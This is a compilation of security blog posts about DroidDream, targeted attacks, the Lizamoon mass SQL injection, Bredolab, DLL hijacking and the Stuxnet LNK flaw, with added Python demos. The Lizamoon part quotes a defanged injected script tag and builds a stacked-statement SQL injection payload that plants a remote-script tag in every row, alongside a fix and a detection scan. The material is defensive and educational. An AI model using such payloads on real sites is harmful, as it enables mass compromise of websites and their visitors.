Mobile Payments, DroidDream and a Reactive Policy Add up to Major Headaches
Malware writers are entrepreneurs who are always looking for the best return on investment. The Android operating system, combined with the Google Wallet Service, will offer a record-setting ROI if current policies continue. Let’s look at why.
According to Gartner and IDC, Android is the market leader in mobile operating systems, so it is logical that cyber criminals will target the platform. Android malware can easily be spread through apps, which makes the platform an attractive target. The beginning of 2011 saw the emergence of this trend, and Android will soon take the lead as the most targeted mobile operating system in terms of malware.
A lot of problems result from the fact that apps can be distributed via different online shops and channels. And nobody, except for security experts, is looking for malware inside the apps.
The first proof that the official Android Market is interesting for cybercriminals was reported in March 2011: DroidDream, a family of malware which uses a pair of exploits to gain root access on vulnerable Android devices. A large number of Android applications were reported to be infected, and all were pulled from the Android Market after the infection was reported to Google. All of the applications were versions of legitimate programs that had been Trojanised and rebuilt by the malware authors, loaded with malicious code. DroidDream sends a collection of information such as the IMEI, IMSI and OS version to the attacker and then attempts to download additional software and payloads.
AMTSO, CARO and EICAR – conferences and events – an overview
The beginning of May was dedicated to three traditionally important security industry events of the year. It started with an AMTSO Meeting, then the CARO Workshop followed and it ended with the EICAR Conference. I participated for G Data in all of them!
You can find the original posting of this article at the G Data Security blog.
G Data is one of the members of AMTSO (www.amtso.org), an organization currently comprised of around 40 members, representing testers, vendors, academics and publishers involved in anti-malware research. I was at the last AMTSO members’ meeting, which was held in Prague. As always, a lot of work was done during the workshops: the document “AMTSO Guidelines on Facilitating Testability” was initiated at the suggestion of testers and developed jointly by testers and vendors. The new paper is the latest in a succession of guidelines and best practice documents already published. The AMTSO members also agreed to expand the range of documentation the organization produces to include more educational material. They also introduced changes to the voting procedure to ensure that documents cannot be approved by the members unless a majority of testers agree that the content is up to standard. This last step is designed to avoid any possibility of bias in favor of any group within the organization.
The Rise of the Targattacks*: Cyber espionage and sabotage: the new way
*Abbr.: targeted attacks
During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:
- The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify their source code repositories. Affected companies included Adobe, Juniper, Google and Yahoo, among others.
- German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to log in to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
- Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful, as the enrichment of uranium was heavily delayed.
- G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
- RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted, but it is still unclear whether it will actually cause problems in the future.
- EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
- Epsilon email breach: Epsilon is a well known online marketing company that works with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers stole customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank and Verizon were involved.
And this list is still not complete.
It never stays quiet on the internet: The Lizamoon attack, the update problem?
It never stays quiet on the internet, and new attacks or malware are seen every day. Last week, however, we saw an interesting mass SQL injection attack, referred to as Lizamoon, which spread quickly and had affected several million URLs within the week (29 March until 4 April). Even a week later, thousands of compromised websites still don’t seem to have been cleaned up.
What are we talking about?
The attack uses SQL injection to insert rogue code into the databases behind the affected websites. SQL injection is a code injection technique in which attacker-supplied input is interpreted as part of a SQL statement rather than as data. The vulnerability is present when user input is concatenated into a query without being correctly escaped (or, better, passed as a bound parameter), or when the input is not strongly typed, so that a value the application expected to be a number is executed as SQL (cf.: Wikipedia).
The following code was injected into a large number of websites (the URL is shown defanged):
<script src=hxxp://lizamoon . com / ur . php >
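As an added example, not code from the original post or from the Lizamoon attackers, the following Python script shows how a string-built SQL lookup lets a crafted parameter append such a script tag to every row of a text column, how a parameterised and strongly typed lookup defuses the same input, and how a site owner can scan the database for the injected tag afterwards. It uses the sqlite3 module; the table, the payload and the defanged host lizamoon.example are constructed for the demo, and executescript() stands in for a database engine that accepts stacked statements (as Microsoft SQL Server does), which is what a mass-injection payload relies on.

```python
"""Added example: vulnerable vs. parameterised lookup, plus a clean-up scan."""
import sqlite3

# Constructed, defanged stand-in for the injected tag shown in the post.
INJECTED_TAG = "<script src=hxxp://lizamoon.example/ur.php></script>"


def setup_db() -> sqlite3.Connection:
    """Throw-away in-memory database with two text columns (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO articles (title, body) VALUES ('Hello', 'First post');"
        "INSERT INTO articles (title, body) VALUES ('News', 'Second post');"
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, article_id: str) -> None:
    """The bug: untrusted input is pasted into the statement text.

    executescript() runs every statement it is handed, standing in for an
    engine that accepts stacked queries; the attacker's second statement
    therefore runs with the application's database privileges.
    """
    conn.executescript("SELECT title FROM articles WHERE id = " + article_id + ";")


def lookup_safe(conn: sqlite3.Connection, article_id: str) -> list:
    """The fix: strong typing plus a bound parameter, so input is never SQL syntax."""
    try:
        ident = int(article_id)  # anything that is not an integer is rejected
    except ValueError:
        return []
    cur = conn.execute("SELECT title FROM articles WHERE id = ?", (ident,))
    return [row[0] for row in cur.fetchall()]


def mass_injection_payload() -> str:
    """Constructed payload in the style of a mass SQL injection: a valid id,
    then a second statement that appends the tag to every row of a text column.
    SQLite concatenates with ||; SQL Server would use +."""
    return "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "'"


def scan_for_injected_script(conn: sqlite3.Connection, table: str, columns: list) -> list:
    """Clean-up check for a site owner: (id, column) pairs holding an injected
    script tag. table/columns come from the administrator's own schema, not
    from users, which is why they may be interpolated here."""
    hits = []
    for col in columns:
        cur = conn.execute(
            f"SELECT id FROM {table} WHERE {col} LIKE ? ORDER BY id",
            ("%<script src=%",),
        )
        hits.extend((row[0], col) for row in cur.fetchall())
    return hits


if __name__ == "__main__":
    db = setup_db()
    print("safe lookup with payload:", lookup_safe(db, mass_injection_payload()))
    lookup_vulnerable(db, mass_injection_payload())
    print("rows carrying the tag:", scan_for_injected_script(db, "articles", ["title", "body"]))
```

The safe variant rejects the payload outright because the id must be an integer; even a text parameter would only have stored the payload as a literal string. The scan is the kind of check that tells a site owner whether they are among the thousands of sites that were still not cleaned up a week later.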
CeBIT 2011 and G Data
CeBIT starts on March 1st in Hannover, showcasing the latest developments in the IT industry. G Data is using the largest IT trade show in the world this year to launch the next generation of security for businesses and home users. G Data presents this year’s trade fair highlight: Generation 11 of its network solutions, equipped with a powerful backup module in all Enterprise versions. Also being revealed is G Data MobileSecurity, a security solution for Android phones. Mobile phone owners will thus be able to effectively secure their mobiles against malware. Another first that will be announced in Hannover is G Data CloudSecurity. This free browser plug-in blocks infected websites, making surfing the internet more secure. Besides presenting these innovations, the provider from Bochum, Germany is also offering a comprehensive programme in the G Data Arena, Hall 11, Booth D35.
I personally will take part in the Global Conferences during a panel session about the importance of security, which is detailed below. It’s an interesting line-up of experienced speakers, CEOs and VPs, who will be sitting next to me. I will be available for interviews and chats the whole week (minus Saturday) at our booth. By the way, I like my new title: Global Security Officer. ;-)
Upcoming meetings and events like AMTSO, RSA, CeBIT, etc …
It seems that my busy months are coming up with a lot of travelling. Very soon you can see me speaking at some national and international events.
Close to my home you can find me at ‘This is IT’ in the Netherlands www.apeldoorn-it.nl/congres (3 February 2011). The week afterwards I will teach the teachers at the ICT day for teachers in Belgium http://www.ictdag.be/ (7 February 2011). After this I will be travelling to San Francisco for AMTSO and the RSA conference (14-18 February 2011). The AMTSO members’ meeting will be held at San Mateo, California, on the 10th-11th February, just before RSA. I’m pretty sure that everybody will find some interesting material coming out of the organization in the next few weeks. There’s more information on this year’s AMTSO meetings on the AMTSO meetings page at http://www.amtso.org/meetings.html, including a preliminary agenda.
And don’t forget CeBIT (1-5 March 2011). This year G Data will take an active part in the very famous CeBIT Global Conferences in Hannover. Dr. Dirk Hochstrate will attend the IT-Security panel on Wednesday, 2 March. At the Global Conferences only the top spokespeople of the IT branch are invited to discuss new trends and their visions for the future. At the same time you can go to our English press conference, where you will see me in front of the room.
I will give you more info about our upcoming CeBIT events soon.
New interesting moves from AMTSO during the last meeting in Munich, Germany
This is a copy from the original posting at the G Data Security Blog.
G Data is one of the members of AMTSO (www.amtso.org), an organisation currently comprised of 37 members, representing testers, vendors, academics and publishers involved in anti-malware research. Last week I was at the last AMTSO members’ meeting which was held in Munich. As always, a lot of work was done during the workshops.
First of all, some guidelines about testing for false positives (FP) were adopted. The false positive issue is a common problem, and the security industry dedicates a lot of resources to ensuring the highest quality and to reducing false positives. We welcome the new joint guidelines related to testing of false positives and we hope that, in the light provided by these new guidelines, the FPs from all security products will be assessed much more fairly. The new documents can be found at www.amtso.org/documents.html.
A critical look at the major takedown of BredoLab by the Dutch High Tech Crime Unit: More International Cybercrime laws needed!
Yesterday, 25 October 2010, The Dutch High Tech Crime Unit of the KLPD announced a major takedown of a large botnet, known as Bredolab.
You can find more and a copy of this blog entry at the original G Data posting page.
Bredolab is a big family of polymorphic Trojans and has been thought to install parts of the Cutwail botnet in the past. The botnet has spread through drive-by downloads and email. Bredolab is known for sending out large email spam campaigns and for installing fake security products. The Dutch company LeaseWeb was hosting this botnet without their knowledge. After the company was informed about this fact, they gave full cooperation to the authorities to take the botnet down.
Even though this was the largest operation against cyber crime in the Netherlands so far, it was not unique. It has been done in several other countries before, like the US and Spain, and even in the Netherlands itself. The striking point is how things will be handled from here. The High Tech Crime unit will use the existing botnet infrastructure to send a program to all infected machines, showing them a warning: “Users of computers with viruses from this network will receive a notice at the time of next login with information on the degree of infection.” This screen is shown in a video. Click the following direct link to see it: http://teamhightechcrime.nationale-recherche.nl/nl_infected.php
New website and the start of my world tour
You have possibly already found out by now that I refurbished my personal website, otherwise you wouldn’t be reading this.
I really hope you like the new look of this site which took us several weeks to come up with. It was really necessary after a long period of silence I think.
With this new look I’m also starting my world tour where I sometimes will attend some conferences and sometimes will speak at these events.
Having just finished G Data’s press tour in the Benelux, I’m ready for the next events:
- BruCon Conference: Brussels, Belgium (attending)
- Virus Bulletin Conference: Vancouver, Canada (speaking together with Righard Zwienenberg (Norman) about internal attacks and problems in the cloud)
- Infosecurity NL: Utrecht, The Netherlands (attending)
- AAVAR Conference: Bali (speaking together with David Harley (Eset) and Lysa Myers (Westcoast Labs) about product evaluation and malware simulation)
- G Data Japan Press Tour: Tokyo (speaking)
And this is just the beginning … more trips are planned even during the writing of this piece.
One trip could be very interesting, but it’s still undecided if I will participate … but stay tuned, as I could meet some VIPs of the world. ;-)
Could the DLL-hijacking problem be underestimated?
This is a small copy of the official G Data Blog
Find the full and official version at www.gdatasoftware.com
Last week, HD Moore released details about a serious DLL loading problem under Windows. HD Moore is known as the developer of the Metasploit framework.
After a week, Microsoft released more information, discussing the bad practices in DLL loading that can lead to remote exploitation and that are the main source of this problem: an application that loads a library by name without a full path can be made to load an attacker’s DLL of the same name from the current working directory, for example a network share or a folder containing a document the user opened. Microsoft has recently released tools that help mitigate the risk. But the real and possibly best solution is for developers to patch their applications to follow best practices, such as loading libraries by full path.
There is little that can be done by those of us in the security community, or by Microsoft for that matter, as many applications rely on the search-order behaviour that causes this flaw, and it could take many weeks or months for application developers to release better designed programs and encourage users to update to these new versions. Some of the programs will be updated automatically, some of them won’t. The mitigations Microsoft is offering do work, but they could make several programs unusable and break backward compatibility.
The Microsoft LNK / USB worm / rootkit ‘issue’ will kill WIN XP SP2 and WIN2000 earlier…
Just recently, reports were released about a new kind of malware propagating through removable drives. The malware exploits a newly discovered vulnerability in shortcut files, which allows arbitrary code to be executed on the user’s system. Microsoft has officially acknowledged the vulnerability and released a security advisory.
The malware that some of the AV industry detects as Win32/Stuxnet is, unfortunately, a worm (and rootkit) of a slightly different colour. It can propagate by making use of a 0-day vulnerability described in Microsoft’s advisory and tracked by CVE as CVE-2010-2568.
The biggest problem is that Windows (specifically, the Windows Shell) can be tricked into executing malicious code presented in a specially-crafted shortcut (.LNK) file linking, in turn, to a malicious DLL (Dynamic Link Library).
The problem lies in the way the Windows Shell parses the shortcut when it loads the shortcut’s icon: it isn’t necessary to click the icon for the malicious code to be executed. The code runs without any action on the part of the user as soon as the folder is opened, for example to access whatever legitimate files are on the device, because Explorer renders the icons of everything in that folder.
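As an added example, not the author’s code and not a Microsoft tool, here is a small triage script for shortcut files in the spirit of the paragraph above. It validates the Shell Link header, walks the LinkTargetIDList (the structure the vulnerable icon-rendering path parsed) and flags any item that embeds a UTF-16 path to a .dll, .cpl or .tmp file, which is what a responder would want to find when sweeping removable media. It is a heuristic for hunting, not a detection signature for CVE-2010-2568; the sample shortcut, its item layout and the path it carries are constructed for the demo.

```python
"""Added example: heuristic triage of .LNK files for embedded module paths."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 as it is laid out on disk.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x1  # LinkFlags bit A
SUSPECT_EXT = re.compile(r"\.(dll|cpl|tmp)$", re.IGNORECASE)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")  # printable UTF-16LE runs


def parse_id_list(data: bytes, offset: int) -> list:
    """Return the raw ItemID blobs of a LinkTargetIDList that starts at offset.

    Layout: IDListSize (2 bytes) followed by ItemIDs, each a 2-byte size that
    counts itself plus the item data, closed by a 2-byte zero (TerminalID).
    """
    (id_list_size,) = struct.unpack_from("<H", data, offset)
    pos, end, items = offset + 2, offset + 2 + id_list_size, []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:
            break
        items.append(data[pos + 2 : pos + item_size])
        pos += item_size
    return items


def suspicious_paths(lnk: bytes) -> list:
    """Paths inside the IDList whose extension names a loadable module."""
    if len(lnk) < LNK_HEADER_SIZE:
        raise ValueError("too short for a Shell Link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", lnk, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    found = []
    for item in parse_id_list(lnk, LNK_HEADER_SIZE):
        for run in UTF16_RUN.findall(item):
            text = run.decode("utf-16-le")
            if SUSPECT_EXT.search(text):
                found.append(text)
    return found


def build_sample_lnk(item_path: str) -> bytes:
    """Constructed shortcut: a valid header and one ItemID holding a UTF-16LE
    path. The item body layout is simplified; only the header, the IDList
    framing and the embedded string mirror the real format."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, HAS_LINK_TARGET_ID_LIST)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    item_data = item_path.encode("utf-16-le") + b"\x00\x00"
    item = struct.pack("<H", len(item_data) + 2) + item_data
    id_list = item + b"\x00\x00"  # TerminalID
    return header + struct.pack("<H", len(id_list)) + id_list


if __name__ == "__main__":
    for path in (r"E:\~payload.tmp", r"C:\Windows\notepad.exe"):
        print(path, "->", suspicious_paths(build_sample_lnk(path)))
```

On a real sweep you would feed every *.lnk from the mounted drive through suspicious_paths() and treat any hit as a reason to image the drive rather than open the folder in Explorer, since, as described above, rendering the icons is enough to trigger the load.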
G Data SecurityLabs expands team with Security Evangelist Eddy Willems
The English and French version of the press release …
G Data SecurityLabs expands team with Security Evangelist Eddy Willems
Bochum, 19. February 2010
G Data today announces they have a new team member: Security Evangelist Eddy Willems. He will divide his time between the G Data SecurityLabs in Bochum (Germany) and the Benelux team.
The Belgian Willems has been active in the field of IT security for over two decades. In that period, he has worked for influential institutes, such as EICAR, of which he is a co-founder and the director of press and information, several CERT associations, and the organization behind the Wildlist as well as for commercial companies, such as NOXS and Kaspersky Labs Benelux.
In his position as Security Evangelist at G Data, Eddy Willems will form the link between technical complexity and the user. He is responsible for clear communication from G Data’s SecurityLabs to the security community, press, distributors, resellers and end users. This means, amongst other things, organizing trainings about products, malware and security, speaking at conferences and advising associations and companies about security.